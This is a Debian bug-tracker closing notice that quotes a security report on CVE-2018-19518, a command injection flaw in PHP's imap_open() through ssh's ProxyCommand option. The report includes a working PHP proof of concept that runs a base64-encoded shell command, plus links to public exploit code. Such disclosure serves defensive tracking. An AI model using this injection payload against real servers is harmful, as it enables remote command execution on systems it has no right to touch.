Your message dated Fri, 28 Apr 2023 09:39:18 +0200
with message-id <[email protected]>
and subject line php7.0 has been removed from Debian
has caused the Debian Bug report #913836,
regarding php7.0-imap: CVE-2018-19518: imap_open() function command injection
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)
--
913836: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=913836
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: php-imap
Version: 1:7.0+49
Severity: grave
Tags: security
Justification: user security hole
Dear Maintainer,
A command injection vulnerability has been identified in the imap
extension of php.
It is located in the imap_open() function which does not validate
correctly the server URI.
imap_open() invokes rsh which is symlinked to ssh on Debian, it results
in a possible command injection via the "-o ProxyCommand" option of ssh.
A PoC is available :
```
<?php
# https://antichat.com/threads/463395/#post-4254681
# echo '1234567890'>/tmp/test0001
$server = "x
-oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}";
imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError:
".imap_last_error());
```
- Bo0om : PHP_imap_open_exploit
https://github.com/Bo0oM/PHP_imap_open_exploit/blob/master/exploit.php
- Antichat : [спущено с LVL8] RCE Task #3
https://antichat.com/threads/463395/#post-4254681
-- System Information:
Debian Release: 9.5
APT prefers stable-updates
APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386
Kernel: Linux 4.9.0-8-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.utf8, LC_CTYPE=en_US.utf8 (charmap=UTF-8), LANGUAGE=en_US:en
(charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)
Versions of packages php-imap depends on:
ii php-common 1:49
ii php7.0-imap 7.0.30-0+deb9u1
php-imap recommends no packages.
php-imap suggests no packages.
-- no debconf information
--- End Message ---
--- Begin Message ---
Version: 7.0.32-1+rm
src:php7.0 was last released with Debian 9 (stretch)
in June 2017 and was removed from the Debian archive afterwards.
It has been superseded by newer versions.
See https://bugs.debian.org/910071 for details on the removal.
After regular security support for stretch ended in July 2020 and LTS
support ended in July 2022, I'm closing the remaining bug reports now.
In case the bug is still present in recent releases, please reopen and
reassign it.
Andreas
--- End Message ---
